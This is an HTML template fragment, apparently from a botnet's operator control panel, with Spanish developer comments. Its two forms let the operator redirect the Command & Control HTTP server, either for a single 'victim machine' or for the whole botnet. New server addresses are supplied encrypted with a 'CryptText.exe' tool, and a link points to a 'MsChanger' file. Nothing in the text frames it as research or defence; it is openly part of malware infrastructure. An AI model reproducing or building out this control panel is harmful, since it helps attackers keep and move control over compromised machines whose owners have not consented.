<app-menu></app-menu>
<h2>CHANGE BOT HTTP SERVER TO CONTROL THE VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Execute this module to change the Command & Control HTTP SERVER. New credentials must be encrypted with "CryptText.exe"</p>
  <p>IP/DNS New HTTP Server in encrypted format<input type="text" /></p>
  <p>Link http where file "MsChanger" is created. Ex. "http://127.0.0.1/MsChanger"<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>CHANGE BOT HTTP SERVER TO CONTROL ALL VICTIM MACHINES - BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Execute this module to change the Command & Control HTTP SERVER for all BOTNET. New credentials must be encrypted with "CryptText.exe"</p>
  <p>IP/DNS New HTTP Server in encrypted format<input type="text" /></p>
  <p>Link http where file "MsChanger" is created. Ex. "http://127.0.0.1/MsChanger"<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>
